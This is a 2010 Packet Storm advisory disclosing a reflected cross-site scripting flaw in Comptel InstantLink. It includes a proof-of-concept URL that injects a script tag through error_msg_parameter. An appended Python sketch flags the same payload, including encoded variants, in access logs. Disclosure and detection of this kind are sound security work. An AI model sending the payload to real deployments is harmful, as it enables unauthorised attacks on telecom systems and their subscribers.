Comptel InstantLink Cross Site Scripting

2010-02-26T00:00:00
ID PACKETSTORM:86722
Type packetstorm
Reporter thebluegenius
Modified 2010-02-26T00:00:00

Description

                                        
--------------------------------------------------------------------  
# Exploit Title: "Comptel InstantLink" XSS vulnerability  
# Date: 24 Feb 2010  
# Author: thebluegenius  
# Software Link: http://www.comptel.com/ProvisioningActivation/  
# Version: All  
# CVE : NA  
  
---------------------------------------------------  
"Comptel InstantLink" XSS vulnerability.  
---------------------------------------------------  
By: Thebluegenius  
Email: rajsm@isac.org.in  
Blog: www.thebluegenius.com  
---------------------------------------------------  
  
Product Name: Comptel Instant Link System  
Vendor: http://www.comptel.com/ProvisioningActivation/  
  
Description:  
  
Comptel InstantLink automates the user provisioning and service activation processes. It covers the entire provisioning workflow - from order entry to billable service.  
  
The product suffers from an XSS vulnerability. Presently this product is deployed to over 280 telecom customers with 800+ million subscribers across the world.  
  
------------------  
Vulnerability: XSS  
------------------  
You can execute the XSS as given below:  
http://IPaddress:port/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E  
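
A detection sketch for the request above, added here as an example and not part of the original advisory: it scans web access logs for requests to /sas5/index.jsp whose error_msg_parameter decodes to markup, tolerating mixed case and repeated percent-encoding. The log lines and their combined-log layout are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Path and parameter name come from the advisory's proof-of-concept URL.
TARGET_PATH = "/sas5/index.jsp"
TARGET_PARAM = "error_msg_parameter"

# An error-message parameter has no reason to carry tag openers, inline event
# handlers or javascript: URLs. Case-insensitive, since the advisory's payload
# is written in mixed case ("ScRiPt").
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript\s*:", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, assumed log layout).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Feb/2010:10:00:01 +0000] "GET /sas5/index.jsp?error_msg_parameter=Invalid+login HTTP/1.1" 200 512',
    '198.51.100.7 - - [26/Feb/2010:10:00:05 +0000] "GET /sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E HTTP/1.1" 200 540',
    '198.51.100.7 - - [26/Feb/2010:10:00:09 +0000] "GET /sas5/index.jsp?error_msg_parameter=%253CScRiPt%253Ealert%2528%2527XSS%2527%2529%253C/ScRiPt%253E HTTP/1.1" 200 540',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%253C -> %3C -> <), bounded in rounds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_line(line):
    """Return the decoded parameter value if the line looks like an XSS probe, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Drop servlet path parameters such as ";jsessionid=..." before comparing.
    if url.path.split(";")[0] != TARGET_PATH:
        return None
    # parse_qsl decodes once; fully_decode peels any further layers.
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        if name == TARGET_PARAM and SUSPICIOUS.search(fully_decode(raw)):
            return fully_decode(raw)
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = ((n, flag_line(l)) for n, l in enumerate(lines, start=1))
    return [(n, v) for n, v in hits if v is not None]
```
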
  
-----------------------------------------------------  
Greetz Fly Out to:  
1] Amforked() : My good friend  
2] Aodrulez : for inspiring me  
3] www.OrchidSeven.com  
4] www.isac.org.in  
  